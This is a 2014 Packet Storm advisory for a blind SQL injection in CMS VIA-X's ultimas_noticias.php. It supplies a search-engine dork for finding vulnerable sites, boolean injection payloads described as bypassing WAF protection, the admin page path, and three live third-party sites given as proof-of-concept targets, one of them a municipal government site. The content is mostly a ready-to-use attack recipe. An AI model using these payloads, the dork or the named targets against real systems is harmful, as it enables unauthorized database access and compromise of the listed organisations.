CMS VIA-X SQL Injection

2014-07-23T00:00:00
ID PACKETSTORM:127591
Type packetstorm
Reporter Felipe Andrian Peixoto
Modified 2014-07-23T00:00:00

Description

                                        
                                            `[+] Blind Sql Injection on CMS VIA-X   
  
[+] Date: 23/07/2014  
  
[+] CWE Number : CWE-89  
  
[+] Risk: High  
  
[+] Author: Felipe Andrian Peixoto  
  
[+] Vendor Homepage: http://www.viax.com.br/  
  
[+] Contact: felipe_andrian@hotmail.com  
  
[+] Tested on: Windows 7 and Linux  
  
[+] Vulnerable File: ultimas_noticias.php  
  
[+} Dork : inurl:ultimas_noticias.php?codnoticia=  
  
[+] Exploit : http://host/ultimas_noticias.php?codnoticia=[BLIND SQL Injection]  
  
ps:use "1'+and+1=2--+" and "1'+and+1=1--+" to bypass the waf protection.  
  
[+] PoC: http://www.camaramuritiba.ba.gov.br/ultimas_noticias.php?codnoticia=37  
http://www.vandelson.com.br/ultimas_noticias.php?codnoticia=53  
http://www.fat.edu.br/ultimas_noticias.php?codnoticia=797  
  
[+] Admin Page: http://host/admin/  
  
  
  
  
`